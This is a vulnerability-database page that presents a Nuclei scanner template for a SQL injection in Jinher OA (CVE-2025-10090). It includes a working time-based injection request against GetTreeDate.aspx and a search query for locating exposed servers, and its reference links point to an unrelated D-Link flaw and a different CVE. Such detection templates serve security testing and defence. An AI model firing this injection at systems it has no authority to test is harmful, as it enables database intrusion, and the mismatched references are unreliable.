/Vulnerability Library

Jinher OA - SQL Injection

CVE-2025-10090
Verified

Description

jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.

Severity

High

CVSS Score

7.3

Exploit Probability

2%

Published Date

February 10, 2026

Template Author

dhiyaneshdk

CVE-2025-10090.yaml
id: CVE-2025-10090

info:
  name: Jinher OA - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-10090
    epss-score: 0.01664
    epss-percentile: 0.73878
    cwe-id: CWE-74,CWE-89
  metadata:
    max-request: 1
    verified: true
    vendor: jinher
    fofa-query: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  tags: cve,cve2025,time-based,sqli,jc6,jinher,vkev

http:
  - raw:
      - |
        @timeout 10s
        GET /C6/Jhsoft.Web.departments/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "permissions")'
        condition: and
# digest: 4a0a00473045022100c130f7dcd45a15782e712d4cdc7f2b6c08f5c742f95861bba1bb2c2c1ab0db0502203aa233f22f5a41516eb44bbd27a0adc89dfd8bfe43353ceb2370995a80867201:922c64590222798bb761d5b6d8e72950
7.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2025-10090
CWE ID:
cwe-74, cwe-89

References

https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.mdhttps://vuldb.com/?id.335869https://nvd.nist.gov/vuln/detail/CVE-2025-14528

Remediation Steps

Update to the latest version.